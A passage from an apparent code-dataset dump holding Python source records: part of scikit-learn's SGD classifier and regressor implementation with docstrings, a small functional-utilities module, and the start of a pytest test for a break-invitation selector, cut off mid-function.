exponent for inverse scaling learning rate [default 0.5].\r\n\r\n early_stopping : bool, default=False\r\n Whether to use early stopping to terminate training when validation\r\n score is not improving. If set to True, it will automatically set aside\r\n a stratified fraction of training data as validation and terminate\r\n training when validation score returned by the `score` method is not\r\n improving by at least tol for n_iter_no_change consecutive epochs.\r\n\r\n .. versionadded:: 0.20\r\n Added 'early_stopping' option\r\n\r\n validation_fraction : float, default=0.1\r\n The proportion of training data to set aside as validation set for\r\n early stopping. Must be between 0 and 1.\r\n Only used if `early_stopping` is True.\r\n\r\n .. versionadded:: 0.20\r\n Added 'validation_fraction' option\r\n\r\n n_iter_no_change : int, default=5\r\n Number of iterations with no improvement to wait before early stopping.\r\n\r\n .. versionadded:: 0.20\r\n Added 'n_iter_no_change' option\r\n\r\n class_weight : dict, {class_label: weight} or \"balanced\", default=None\r\n Preset for the class_weight fit parameter.\r\n\r\n Weights associated with classes. 
If not given, all classes\r\n are supposed to have weight one.\r\n\r\n The \"balanced\" mode uses the values of y to automatically adjust\r\n weights inversely proportional to class frequencies in the input data\r\n as ``n_samples / (n_classes * np.bincount(y))``.\r\n\r\n warm_start : bool, default=False\r\n When set to True, reuse the solution of the previous call to fit as\r\n initialization, otherwise, just erase the previous solution.\r\n See :term:`the Glossary `.\r\n\r\n Repeatedly calling fit or partial_fit when warm_start is True can\r\n result in a different solution than when calling fit a single time\r\n because of the way the data is shuffled.\r\n If a dynamic learning rate is used, the learning rate is adapted\r\n depending on the number of samples already seen. Calling ``fit`` resets\r\n this counter, while ``partial_fit`` will result in increasing the\r\n existing counter.\r\n\r\n average : bool or int, default=False\r\n When set to True, computes the averaged SGD weights accross all\r\n updates and stores the result in the ``coef_`` attribute. If set to\r\n an int greater than 1, averaging will begin once the total number of\r\n samples seen reaches `average`. So ``average=10`` will begin\r\n averaging after seeing 10 samples.\r\n\r\n Attributes\r\n ----------\r\n coef_ : ndarray of shape (1, n_features) if n_classes == 2 else \\\r\n (n_classes, n_features)\r\n Weights assigned to the features.\r\n\r\n intercept_ : ndarray of shape (1,) if n_classes == 2 else (n_classes,)\r\n Constants in decision function.\r\n\r\n n_iter_ : int\r\n The actual number of iterations before reaching the stopping criterion.\r\n For multiclass fits, it is the maximum over every binary fit.\r\n\r\n loss_function_ : concrete ``LossFunction``\r\n\r\n classes_ : array of shape (n_classes,)\r\n\r\n t_ : int\r\n Number of weight updates performed during training.\r\n Same as ``(n_iter_ * n_samples)``.\r\n\r\n See Also\r\n --------\r\n sklearn.svm.LinearSVC : Linear support vector classification.\r\n LogisticRegression : Logistic regression.\r\n Perceptron : Inherits from SGDClassifier. ``Perceptron()`` is equivalent to\r\n ``SGDClassifier(loss=\"perceptron\", eta0=1, learning_rate=\"constant\",\r\n penalty=None)``.\r\n\r\n Examples\r\n --------\r\n >>> import numpy as np\r\n >>> from sklearn.linear_model import SGDClassifier\r\n >>> from sklearn.preprocessing import StandardScaler\r\n >>> from sklearn.pipeline import make_pipeline\r\n >>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])\r\n >>> Y = np.array([1, 1, 2, 2])\r\n >>> # Always scale the input. The most convenient way is to use a pipeline.\r\n >>> clf = make_pipeline(StandardScaler(),\r\n ... 
SGDClassifier(max_iter=1000, tol=1e-3))\r\n >>> clf.fit(X, Y)\r\n Pipeline(steps=[('standardscaler', StandardScaler()),\r\n ('sgdclassifier', SGDClassifier())])\r\n >>> print(clf.predict([[-0.8, -1]]))\r\n [1]\r\n \"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"hinge\", *, penalty='l2', alpha=0.0001,\r\n l1_ratio=0.15,\r\n fit_intercept=True, max_iter=1000, tol=1e-3, shuffle=True,\r\n verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,\r\n random_state=None, learning_rate=\"optimal\", eta0=0.0,\r\n power_t=0.5, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, class_weight=None, warm_start=False,\r\n average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, class_weight=class_weight,\r\n warm_start=warm_start, average=average)\r\n\r\n def _check_proba(self):\r\n if self.loss not in (\"log\", \"modified_huber\"):\r\n raise AttributeError(\"probability estimates are not available for\"\r\n \" loss=%r\" % self.loss)\r\n\r\n @property\r\n def predict_proba(self):\r\n \"\"\"Probability estimates.\r\n\r\n This method is only available for log loss and modified Huber loss.\r\n\r\n Multiclass probability estimates are derived from binary (one-vs.-rest)\r\n estimates by simple normalization, as recommended by Zadrozny and\r\n Elkan.\r\n\r\n Binary probability estimates for loss=\"modified_huber\" are given by\r\n (clip(decision_function(X), -1, 1) + 1) / 2. 
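In array terms this is roughly the following (an illustrative\r\n        sketch only; the method itself also handles the multiclass\r\n        bookkeeping)::\r\n\r\n            scores = clf.decision_function(X)\r\n            proba_positive = (np.clip(scores, -1, 1) + 1) / 2\r\n\r\n        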
For other loss functions\r\n it is necessary to perform proper probability calibration by wrapping\r\n the classifier with\r\n :class:`~sklearn.calibration.CalibratedClassifierCV` instead.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Input data for prediction.\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples, n_classes)\r\n Returns the probability of the sample for each class in the model,\r\n where classes are ordered as they are in `self.classes_`.\r\n\r\n References\r\n ----------\r\n Zadrozny and Elkan, \"Transforming classifier scores into multiclass\r\n probability estimates\", SIGKDD'02,\r\n http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf\r\n\r\n The justification for the formula in the loss=\"modified_huber\"\r\n case is in the appendix B in:\r\n http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf\r\n \"\"\"\r\n self._check_proba()\r\n return self._predict_proba\r\n\r\n def _predict_proba(self, X):\r\n check_is_fitted(self)\r\n\r\n if self.loss == \"log\":\r\n return self._predict_proba_lr(X)\r\n\r\n elif self.loss == \"modified_huber\":\r\n binary = (len(self.classes_) == 2)\r\n scores = self.decision_function(X)\r\n\r\n if binary:\r\n prob2 = np.ones((scores.shape[0], 2))\r\n prob = prob2[:, 1]\r\n else:\r\n prob = scores\r\n\r\n np.clip(scores, -1, 1, prob)\r\n prob += 1.\r\n prob /= 2.\r\n\r\n if binary:\r\n prob2[:, 0] -= prob\r\n prob = prob2\r\n else:\r\n # the above might assign zero to all classes, which doesn't\r\n # normalize neatly; work around this to produce uniform\r\n # probabilities\r\n prob_sum = prob.sum(axis=1)\r\n all_zero = (prob_sum == 0)\r\n if np.any(all_zero):\r\n prob[all_zero, :] = 1\r\n prob_sum[all_zero] = len(self.classes_)\r\n\r\n # normalize\r\n prob /= prob_sum.reshape((prob.shape[0], -1))\r\n\r\n return prob\r\n\r\n else:\r\n raise NotImplementedError(\"predict_(log_)proba only supported when\"\r\n \" loss='log' or loss='modified_huber' \"\r\n \"(%r given)\" % self.loss)\r\n\r\n @property\r\n def predict_log_proba(self):\r\n \"\"\"Log of probability estimates.\r\n\r\n This method is only available for log loss and modified Huber loss.\r\n\r\n When loss=\"modified_huber\", probability estimates may be hard zeros\r\n and ones, so taking the logarithm is not possible.\r\n\r\n See ``predict_proba`` for details.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix} of shape (n_samples, n_features)\r\n Input data for prediction.\r\n\r\n Returns\r\n -------\r\n T : array-like, shape (n_samples, n_classes)\r\n Returns the log-probability of the sample for each class in the\r\n model, where classes are ordered as they are in\r\n `self.classes_`.\r\n \"\"\"\r\n self._check_proba()\r\n return self._predict_log_proba\r\n\r\n def _predict_log_proba(self, X):\r\n return np.log(self.predict_proba(X))\r\n\r\n def _more_tags(self):\r\n return {\r\n '_xfail_checks': {\r\n 'check_sample_weights_invariance':\r\n 'zero sample_weight is not equivalent to removing samples',\r\n }\r\n }\r\n\r\n\r\nclass BaseSGDRegressor(RegressorMixin, BaseSGD):\r\n\r\n loss_functions = {\r\n \"squared_loss\": (SquaredLoss, ),\r\n \"huber\": (Huber, DEFAULT_EPSILON),\r\n \"epsilon_insensitive\": (EpsilonInsensitive, DEFAULT_EPSILON),\r\n \"squared_epsilon_insensitive\": (SquaredEpsilonInsensitive,\r\n DEFAULT_EPSILON),\r\n }\r\n\r\n @abstractmethod\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"squared_loss\", *, penalty=\"l2\", alpha=0.0001,\r\n 
l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,\r\n random_state=None, learning_rate=\"invscaling\", eta0=0.01,\r\n power_t=0.25, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n\r\n def _partial_fit(self, X, y, alpha, C, loss, learning_rate,\r\n max_iter, sample_weight, coef_init, intercept_init):\r\n X, y = self._validate_data(X, y, accept_sparse=\"csr\", copy=False,\r\n order='C', dtype=np.float64,\r\n accept_large_sparse=False)\r\n y = y.astype(np.float64, copy=False)\r\n\r\n n_samples, n_features = X.shape\r\n\r\n sample_weight = _check_sample_weight(sample_weight, X)\r\n\r\n # Allocate datastructures from input arguments\r\n if getattr(self, \"coef_\", None) is None:\r\n self._allocate_parameter_mem(1, n_features, coef_init,\r\n intercept_init)\r\n elif n_features != self.coef_.shape[-1]:\r\n raise ValueError(\"Number of features %d does not match previous \"\r\n \"data %d.\" % (n_features, self.coef_.shape[-1]))\r\n if self.average > 0 and getattr(self, \"_average_coef\", None) is None:\r\n self._average_coef = np.zeros(n_features,\r\n dtype=np.float64,\r\n order=\"C\")\r\n self._average_intercept = np.zeros(1, dtype=np.float64, order=\"C\")\r\n\r\n self._fit_regressor(X, y, alpha, C, loss, learning_rate,\r\n sample_weight, max_iter)\r\n\r\n return self\r\n\r\n def partial_fit(self, X, y, sample_weight=None):\r\n \"\"\"Perform one epoch of stochastic gradient descent on given samples.\r\n\r\n Internally, this method uses ``max_iter = 1``. Therefore, it is not\r\n guaranteed that a minimum of the cost function is reached after calling\r\n it once. 
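For example, a minimal out-of-core loop might look like the\r\n        following sketch (``iter_minibatches`` is a hypothetical helper\r\n        yielding ``(X, y)`` chunks)::\r\n\r\n            reg = SGDRegressor()\r\n            for X_chunk, y_chunk in iter_minibatches():\r\n                reg.partial_fit(X_chunk, y_chunk)\r\n\r\n        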
Matters such as objective convergence and early stopping\r\n should be handled by the user.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Subset of training data\r\n\r\n y : numpy array of shape (n_samples,)\r\n Subset of target values\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed.\r\n\r\n Returns\r\n -------\r\n self : returns an instance of self.\r\n \"\"\"\r\n self._validate_params(for_partial_fit=True)\r\n return self._partial_fit(X, y, self.alpha, C=1.0,\r\n loss=self.loss,\r\n learning_rate=self.learning_rate, max_iter=1,\r\n sample_weight=sample_weight, coef_init=None,\r\n intercept_init=None)\r\n\r\n def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,\r\n intercept_init=None, sample_weight=None):\r\n self._validate_params()\r\n if self.warm_start and getattr(self, \"coef_\", None) is not None:\r\n if coef_init is None:\r\n coef_init = self.coef_\r\n if intercept_init is None:\r\n intercept_init = self.intercept_\r\n else:\r\n self.coef_ = None\r\n self.intercept_ = None\r\n\r\n # Clear iteration count for multiple call to fit.\r\n self.t_ = 1.0\r\n\r\n self._partial_fit(X, y, alpha, C, loss, learning_rate,\r\n self.max_iter, sample_weight, coef_init,\r\n intercept_init)\r\n\r\n if (self.tol is not None and self.tol > -np.inf\r\n and self.n_iter_ == self.max_iter):\r\n warnings.warn(\"Maximum number of iteration reached before \"\r\n \"convergence. Consider increasing max_iter to \"\r\n \"improve the fit.\",\r\n ConvergenceWarning)\r\n\r\n return self\r\n\r\n def fit(self, X, y, coef_init=None, intercept_init=None,\r\n sample_weight=None):\r\n \"\"\"Fit linear model with Stochastic Gradient Descent.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Training data\r\n\r\n y : ndarray of shape (n_samples,)\r\n Target values\r\n\r\n coef_init : ndarray of shape (n_features,), default=None\r\n The initial coefficients to warm-start the optimization.\r\n\r\n intercept_init : ndarray of shape (1,), default=None\r\n The initial intercept to warm-start the optimization.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples (1. 
for unweighted).\r\n\r\n Returns\r\n -------\r\n self : returns an instance of self.\r\n \"\"\"\r\n return self._fit(X, y, alpha=self.alpha, C=1.0,\r\n loss=self.loss, learning_rate=self.learning_rate,\r\n coef_init=coef_init,\r\n intercept_init=intercept_init,\r\n sample_weight=sample_weight)\r\n\r\n def _decision_function(self, X):\r\n \"\"\"Predict using the linear model\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples,)\r\n Predicted target values per element in X.\r\n \"\"\"\r\n check_is_fitted(self)\r\n\r\n X = check_array(X, accept_sparse='csr')\r\n\r\n scores = safe_sparse_dot(X, self.coef_.T,\r\n dense_output=True) + self.intercept_\r\n return scores.ravel()\r\n\r\n def predict(self, X):\r\n \"\"\"Predict using the linear model\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples,)\r\n Predicted target values per element in X.\r\n \"\"\"\r\n return self._decision_function(X)\r\n\r\n def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,\r\n sample_weight, max_iter):\r\n dataset, intercept_decay = make_dataset(X, y, sample_weight)\r\n\r\n loss_function = self._get_loss_function(loss)\r\n penalty_type = self._get_penalty_type(self.penalty)\r\n learning_rate_type = self._get_learning_rate_type(learning_rate)\r\n\r\n if not hasattr(self, \"t_\"):\r\n self.t_ = 1.0\r\n\r\n validation_mask = self._make_validation_split(y)\r\n validation_score_cb = self._make_validation_score_cb(\r\n validation_mask, X, y, sample_weight)\r\n\r\n random_state = check_random_state(self.random_state)\r\n # numpy mtrand expects a C long which is a signed 32 bit integer under\r\n # Windows\r\n seed = random_state.randint(0, np.iinfo(np.int32).max)\r\n\r\n tol = self.tol if self.tol is not None else -np.inf\r\n\r\n if self.average:\r\n coef = self._standard_coef\r\n intercept = self._standard_intercept\r\n average_coef = self._average_coef\r\n average_intercept = self._average_intercept\r\n else:\r\n coef = self.coef_\r\n intercept = self.intercept_\r\n average_coef = None # Not used\r\n average_intercept = [0] # Not used\r\n\r\n coef, intercept, average_coef, average_intercept, self.n_iter_ = \\\r\n _plain_sgd(coef,\r\n intercept[0],\r\n average_coef,\r\n average_intercept[0],\r\n loss_function,\r\n penalty_type,\r\n alpha, C,\r\n self.l1_ratio,\r\n dataset,\r\n validation_mask, self.early_stopping,\r\n validation_score_cb,\r\n int(self.n_iter_no_change),\r\n max_iter, tol,\r\n int(self.fit_intercept),\r\n int(self.verbose),\r\n int(self.shuffle),\r\n seed,\r\n 1.0, 1.0,\r\n learning_rate_type,\r\n self.eta0, self.power_t, self.t_,\r\n intercept_decay, self.average)\r\n\r\n self.t_ += self.n_iter_ * X.shape[0]\r\n\r\n if self.average > 0:\r\n self._average_intercept = np.atleast_1d(average_intercept)\r\n self._standard_intercept = np.atleast_1d(intercept)\r\n\r\n if self.average <= self.t_ - 1.0:\r\n # made enough updates for averaging to be taken into account\r\n self.coef_ = average_coef\r\n self.intercept_ = np.atleast_1d(average_intercept)\r\n else:\r\n self.coef_ = coef\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n else:\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n\r\nclass SGDRegressor(BaseSGDRegressor):\r\n \"\"\"Linear model fitted by minimizing a regularized empirical loss with SGD\r\n\r\n SGD stands for Stochastic Gradient Descent: the gradient of the loss 
is\r\n estimated each sample at a time and the model is updated along the way with\r\n a decreasing strength schedule (aka learning rate).\r\n\r\n The regularizer is a penalty added to the loss function that shrinks model\r\n parameters towards the zero vector using either the squared euclidean norm\r\n L2 or the absolute norm L1 or a combination of both (Elastic Net). If the\r\n parameter update crosses the 0.0 value because of the regularizer, the\r\n update is truncated to 0.0 to allow for learning sparse models and achieve\r\n online feature selection.\r\n\r\n This implementation works with data represented as dense numpy arrays of\r\n floating point values for the features.\r\n\r\n Read more in the :ref:`User Guide `.\r\n\r\n Parameters\r\n ----------\r\n loss : str, default='squared_loss'\r\n The loss function to be used. The possible values are 'squared_loss',\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'\r\n\r\n The 'squared_loss' refers to the ordinary least squares fit.\r\n 'huber' modifies 'squared_loss' to focus less on getting outliers\r\n correct by switching from squared to linear loss past a distance of\r\n epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is\r\n linear past that; this is the loss function used in SVR.\r\n 'squared_epsilon_insensitive' is the same but becomes squared loss past\r\n a tolerance of epsilon.\r\n\r\n More details about the losses formulas can be found in the\r\n :ref:`User Guide `.\r\n\r\n penalty : {'l2', 'l1', 'elasticnet'}, default='l2'\r\n The penalty (aka regularization term) to be used. Defaults to 'l2'\r\n which is the standard regularizer for linear SVM models. 'l1' and\r\n 'elasticnet' might bring sparsity to the model (feature selection)\r\n not achievable with 'l2'.\r\n\r\n alpha : float, default=0.0001\r\n Constant that multiplies the regularization term. The higher the\r\n value, the stronger the regularization.\r\n Also used to compute the learning rate when set to `learning_rate` is\r\n set to 'optimal'.\r\n\r\n l1_ratio : float, default=0.15\r\n The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.\r\n l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.\r\n Only used if `penalty` is 'elasticnet'.\r\n\r\n fit_intercept : bool, default=True\r\n Whether the intercept should be estimated or not. If False, the\r\n data is assumed to be already centered.\r\n\r\n max_iter : int, default=1000\r\n The maximum number of passes over the training data (aka epochs).\r\n It only impacts the behavior in the ``fit`` method, and not the\r\n :meth:`partial_fit` method.\r\n\r\n .. versionadded:: 0.19\r\n\r\n tol : float, default=1e-3\r\n The stopping criterion. If it is not None, training will stop\r\n when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive\r\n epochs.\r\n\r\n .. 
versionadded:: 0.19\r\n\r\n shuffle : bool, default=True\r\n Whether or not the training data should be shuffled after each epoch.\r\n\r\n verbose : int, default=0\r\n The verbosity level.\r\n\r\n epsilon : float, default=0.1\r\n Epsilon in the epsilon-insensitive loss functions; only if `loss` is\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n For 'huber', determines the threshold at which it becomes less\r\n important to get the prediction exactly right.\r\n For epsilon-insensitive, any differences between the current prediction\r\n and the correct label are ignored if they are less than this threshold.\r\n\r\n random_state : int, RandomState instance, default=None\r\n Used for shuffling the data, when ``shuffle`` is set to ``True``.\r\n Pass an int for reproducible output across multiple function calls.\r\n See :term:`Glossary `.\r\n\r\n learning_rate : string, default='invscaling'\r\n The learning rate schedule:\r\n\r\n - 'constant': `eta = eta0`\r\n - 'optimal': `eta = 1.0 / (alpha * (t + t0))`\r\n where t0 is chosen by a heuristic proposed by Leon Bottou.\r\n - 'invscaling': `eta = eta0 / pow(t, power_t)`\r\n - 'adaptive': eta = eta0, as long as the training keeps decreasing.\r\n Each time n_iter_no_change consecutive epochs fail to decrease the\r\n training loss by tol or fail to increase validation score by tol if\r\n early_stopping is True, the current learning rate is divided by 5.\r\n\r\n .. versionadded:: 0.20\r\n Added 'adaptive' option\r\n\r\n eta0 : double, default=0.01\r\n The initial learning rate for the 'constant', 'invscaling' or\r\n 'adaptive' schedules. The default value is 0.01.\r\n\r\n power_t : double, default=0.25\r\n The exponent for inverse scaling learning rate.\r\n\r\n early_stopping : bool, default=False\r\n Whether to use early stopping to terminate training when validation\r\n score is not improving. If set to True, it will automatically set aside\r\n a fraction of training data as validation and terminate\r\n training when validation score returned by the `score` method is not\r\n improving by at least `tol` for `n_iter_no_change` consecutive\r\n epochs.\r\n\r\n .. versionadded:: 0.20\r\n Added 'early_stopping' option\r\n\r\n validation_fraction : float, default=0.1\r\n The proportion of training data to set aside as validation set for\r\n early stopping. Must be between 0 and 1.\r\n Only used if `early_stopping` is True.\r\n\r\n .. versionadded:: 0.20\r\n Added 'validation_fraction' option\r\n\r\n n_iter_no_change : int, default=5\r\n Number of iterations with no improvement to wait before early stopping.\r\n\r\n .. versionadded:: 0.20\r\n Added 'n_iter_no_change' option\r\n\r\n warm_start : bool, default=False\r\n When set to True, reuse the solution of the previous call to fit as\r\n initialization, otherwise, just erase the previous solution.\r\n See :term:`the Glossary `.\r\n\r\n Repeatedly calling fit or partial_fit when warm_start is True can\r\n result in a different solution than when calling fit a single time\r\n because of the way the data is shuffled.\r\n If a dynamic learning rate is used, the learning rate is adapted\r\n depending on the number of samples already seen. Calling ``fit`` resets\r\n this counter, while ``partial_fit`` will result in increasing the\r\n existing counter.\r\n\r\n average : bool or int, default=False\r\n When set to True, computes the averaged SGD weights accross all\r\n updates and stores the result in the ``coef_`` attribute. 
If set to\r\n an int greater than 1, averaging will begin once the total number of\r\n samples seen reaches `average`. So ``average=10`` will begin\r\n averaging after seeing 10 samples.\r\n\r\n Attributes\r\n ----------\r\n coef_ : ndarray of shape (n_features,)\r\n Weights assigned to the features.\r\n\r\n intercept_ : ndarray of shape (1,)\r\n The intercept term.\r\n\r\n average_coef_ : ndarray of shape (n_features,)\r\n Averaged weights assigned to the features. Only available\r\n if ``average=True``.\r\n\r\n .. deprecated:: 0.23\r\n Attribute ``average_coef_`` was deprecated\r\n in version 0.23 and will be removed in 1.0 (renaming of 0.25).\r\n\r\n average_intercept_ : ndarray of shape (1,)\r\n The averaged intercept term. Only available if ``average=True``.\r\n\r\n .. deprecated:: 0.23\r\n Attribute ``average_intercept_`` was deprecated\r\n in version 0.23 and will be removed in 1.0 (renaming of 0.25).\r\n\r\n n_iter_ : int\r\n The actual number of iterations before reaching the stopping criterion.\r\n\r\n t_ : int\r\n Number of weight updates performed during training.\r\n Same as ``(n_iter_ * n_samples)``.\r\n\r\n Examples\r\n --------\r\n >>> import numpy as np\r\n >>> from sklearn.linear_model import SGDRegressor\r\n >>> from sklearn.pipeline import make_pipeline\r\n >>> from sklearn.preprocessing import StandardScaler\r\n >>> n_samples, n_features = 10, 5\r\n >>> rng = np.random.RandomState(0)\r\n >>> y = rng.randn(n_samples)\r\n >>> X = rng.randn(n_samples, n_features)\r\n >>> # Always scale the input. The most convenient way is to use a pipeline.\r\n >>> reg = make_pipeline(StandardScaler(),\r\n ... SGDRegressor(max_iter=1000, tol=1e-3))\r\n >>> reg.fit(X, y)\r\n Pipeline(steps=[('standardscaler', StandardScaler()),\r\n ('sgdregressor', SGDRegressor())])\r\n\r\n See Also\r\n --------\r\n Ridge, ElasticNet, Lasso, sklearn.svm.SVR\r\n\r\n \"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"squared_loss\", *, penalty=\"l2\", alpha=0.0001,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,\r\n random_state=None, learning_rate=\"invscaling\", eta0=0.01,\r\n power_t=0.25, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n\r\n def _more_tags(self):\r\n return {\r\n '_xfail_checks': {\r\n 'check_sample_weights_invariance':\r\n 'zero sample_weight is not equivalent to removing samples',\r\n }\r\n }\r\n"} {"ext": "py", "sha": "1a2ea4a95b867ca5afe641e37e6aa7e734f024ea", "content": "\"\"\"\nCompai core functions\n\"\"\"\n\n\nfrom functools import partial, reduce, wraps\nfrom operator import itemgetter\nfrom typing import Callable, List, TypeVar\n\nT = TypeVar('T')\n\n\ndef compose(*F: List[Callable]):\n \"\"\"Compose the list of functions in F from right to left\n\n Arguments:\n F: List of functions\n\n Examples:\n ```pycon\n >>> compose(lambda x: x + 1, lambda x: x * 2)(5)\n 11\n >>>\n ```\n \"\"\"\n return reduce(lambda f, g: lambda x: f(g(x)), F)\n\n\ndef fmap(f):\n return partial(map, f)\n\n\ndef 
ffilter(f):\n return partial(filter, f)\n\n\ndef none_map(func, if_none=None):\n \"\"\"Returns a function that will call func if the argument is not none, and return if_none otherwise.\n\n Examples:\n ```pycon\n >>> f = none_map(str, if_none=const(1))\n >>> f(1)\n '1'\n >>> f(None)\n 1\n >>>\n ```\n \"\"\"\n\n @wraps(func)\n def _func(x):\n if x is not None:\n return func(x)\n\n return if_none()\n\n return _func\n\n\ndef tupled(func):\n \"\"\"Returns a tupled version of the function.\n\n Examples:\n ```pycon\n >>> tupled(lambda a, b: a + b)((2, 3))\n 5\n >>>\n ```\n \"\"\"\n\n @wraps(func)\n def _func(x):\n return func(*x)\n\n return _func\n\n\ndef tuple_map(*fs):\n \"\"\"Returns a function that will apply every f_i for evey element of the tuple argument.\n\n Examples:\n ```pycon\n >>> inc = lambda x: x + 1\n >>> tuple_map(None, inc)((1, 2))\n (1, 3)\n >>> tuple_map(inc)((1, 2))\n (2, 2)\n >>>\n ```\n \"\"\"\n\n return compose(\n tuple,\n fmap(\n tupled(lambda i, v: fs[i](v) if i < len(fs) and fs[i] else v),\n ),\n enumerate,\n )\n\n\ndef dict_map(**fs):\n \"\"\"Map especific elements in a dict.\n\n Examples:\n ```pycon\n >>> dict_map(a=int, b=str)(dict(a='1', b=123, c=True))\n {'a': 1, 'b': '123', 'c': True}\n >>>\n ```\n \"\"\"\n\n def _change_dict(d):\n d = d.copy()\n\n for k, f in fs.items():\n if k in d:\n d[k] = f(d[k])\n\n return d\n\n return _change_dict\n\n\ndef identity(x):\n return x\n\n\ndef apply(f, *args):\n return f(*args)\n\n\ndef const(x: T) -> Callable[..., T]:\n \"\"\"Returns a function that will always return `x`.\n\n Arguments:\n x: Any value\n\n Examples:\n ```pycon\n >>> f = const('foo')\n >>> f()\n 'foo'\n >>> f(1, a='brr')\n 'foo'\n >>>\n ```\n \"\"\"\n\n return lambda *_, **__: x\n\n\ndef length(xs):\n \"\"\"Returns the length of xs.\n\n Examples:\n ```pycon\n >>> length([1, 2, 3])\n 3\n >>> length(range(10))\n 10\n >>> length(None for _ in range(10))\n 10\n >>>\n ```\n \"\"\"\n\n len_ = getattr(xs, '__len__', None)\n\n def default_len():\n return sum(1 for _ in xs)\n\n return compose(\n apply,\n none_map(identity, if_none=const(default_len))\n )(len_)\n\n\ndef swap(x):\n return itemgetter(1, 0)(x)\n"} {"ext": "py", "sha": "1a2ea62077698c22303df4b8b2247d3b05a6f55f", "content": "from datetime import datetime, timedelta\n\nimport pytest\nimport pytz\n\nfrom kaffepause.breaks.selectors import get_pending_break_invitations\nfrom kaffepause.breaks.test.factories import BreakFactory, BreakInvitationFactory\n\npytestmark = pytest.mark.django_db\n\n\ndef test_get_break_invitations_awaiting_reply_returns_unanswered_invitations(user):\n \"\"\"Should return all non-expired break invitations the user has not replied to.\"\"\"\n unanswered_break_invitation = BreakInvitationFactory()\n unanswered_break_invitation.subject.connect(BreakFactory())\n unanswered_break_invitation.addressees.connect(user)\n\n an_hour_ago = datetime.now(pytz.utc) - timedelta(hours=10)\n expired_break = BreakFactory()\n expired_break.starting_at = an_hour_ago\n expired_break.save()\n expired_break_invitation = BreakInvitationFactory()\n expired_break_invitation.subject.connect(expired_break)\n expired_break_invitation.addressees.connect(user)\n\n accepted_break_invitation = BreakInvitationFactory()\n accepted_break_invitation.subject.connect(BreakFactory())\n accepted_break_invitation.addressees.connect(user)\n accepted_break_invitation.acceptees.connect(user)\n\n declined_break_invitation = BreakInvitationFactory()\n declined_break_invitation.subject.connect(BreakFactory())\n 
